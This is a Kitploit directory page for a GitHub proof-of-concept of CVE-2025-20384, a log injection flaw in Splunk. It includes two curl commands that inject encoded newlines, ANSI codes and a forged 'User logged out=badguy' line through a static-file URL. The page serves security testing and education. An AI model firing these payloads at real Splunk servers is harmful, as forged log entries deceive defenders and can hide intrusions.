Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-20384 — Proof-of-concept demonstrating log injection and poisoning in Splunk via crafted URL parameters, highlighting OWASP log injection risks. | Kitploit
Tools/GitHubGitHub/axselll/cve-2025-20384
Vulnerability AnalysisExploitationWeb SecurityPenetration TestingLearning & EducationLog Analysis
GitHubaxselll/cve-2025-20384

CVE-2025-20384

Proof-of-concept demonstrating log injection and poisoning in Splunk via crafted URL parameters, highlighting OWASP log injection risks.

View Repository
28 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

SPLUNK CVE-2025-20384

i dunno, i just read stuff my friendo sent to me and start typing down some random sorry ass nub javascript code

Log Injection/Forgery/Poisoning/Obfuscate type POC

Please read this arcticle OWASP Log Injection

TL;DR

  • Look for static file, passed it and append some random parameter

  • So, i pass curl -k "https://localhost:8000/en-US/static/app/search/application.css%0Atest%0A%0A%0AWARN%3A%20User%20logged%20out%3Dbadguy%0A----LOG_INJECTION_TEST_12345----" OR curl -k "https://localhost:8000/en-US/static/app/search/application.css%1B[31mANSI_TEST_RED%1B[0m%0Atest%0A%0A%0AWARN%3A%20User%20logged%20out%3Dbadguy%0A----LOG_INJECTION_TEST_12345----"

  • If you see some random newline appears that is poisoning, might feel fine because it is just some "normal" poisoning but it can be annoying if it is heavily targeted.

Ref

Link to CVE record

Download Tool